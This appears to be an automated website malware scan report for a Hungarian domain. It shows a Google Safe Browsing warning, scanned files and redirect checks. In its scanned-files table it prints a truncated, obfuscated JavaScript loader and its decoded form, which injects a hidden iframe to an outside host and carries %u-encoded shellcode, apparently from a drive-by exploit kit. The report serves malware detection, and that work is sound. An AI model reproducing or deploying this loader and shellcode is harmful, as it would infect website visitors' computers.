Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=u2dalok.hu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://u2dalok.hu/ | 200 OK Content-Length: 298 Content-Type: text/html | clean |
http://kopas.co.kr/adm/indexm.php | 200 OK Content-Length: 4510 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function tNxHJ(Vd9U){return Vd9U.replace(/%/g,'').replace(/['tnZl]/g,phnSt)}
mBs2='t64ocumet6el74.wl72il74e(t22t3cZ64iv st74yt6cZ65n3dt5cl22posin74it6ft6et3aat62soZ6cZ75n74et3bn20Z6cefZ74l3an2dl31Z30Z300pZ78n3b t74opZ3at2d1t3000pxt3bn5cZ22t3et22Z29n3bfun6ecZ74iol6en20i73(a)Z7bdt6fcumet6en74Z2ewril74e(n22Z3cifZ72n61me t73rcn3dl5ct22hZ74l74t70l3aZ2fl2fn6bl6fn70Z61l73.n63o.krl2fadmt2fit6edexmt2ephl70t3fZ73t3ddiuzl34kFHmZ26Z69dn3dZ22Z2ba+n22Z5cZ22 ...[4078 bytes skipped]... Decoded script: document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe src=\"http://kopas.co.kr/adm/indexm.php?s=diuz4kFHm&id="+a+"\"></iframe>");}m66y=0;var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u8BBF%uE34B%uF ...[4336 bytes skipped]... | ||
http://u2dalok.hu/test404page.js | 404 Not Found Content-Length: 276 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: u2dalok.hu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 18:57:21 GMT
Accept-Ranges: bytes
ETag: "c6c16f-12a-4951a55157300"
Server: Apache/2.2
Content-Length: 298
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 16:57:16 GMT
...298 bytes of data.
GET / HTTP/1.1
Host: u2dalok.hu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 18:57:21 GMT
Accept-Ranges: bytes
ETag: "c6c16f-12a-4951a55157300"
Server: Apache/2.2
Content-Length: 298
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 16:57:16 GMT
...298 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: u2dalok.hu
Referer: http://www.google.com/search?q=u2dalok.hu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: u2dalok.hu
Referer: http://www.google.com/search?q=u2dalok.hu
Result:
The result is similar to the first query. There are no suspicious redirects found.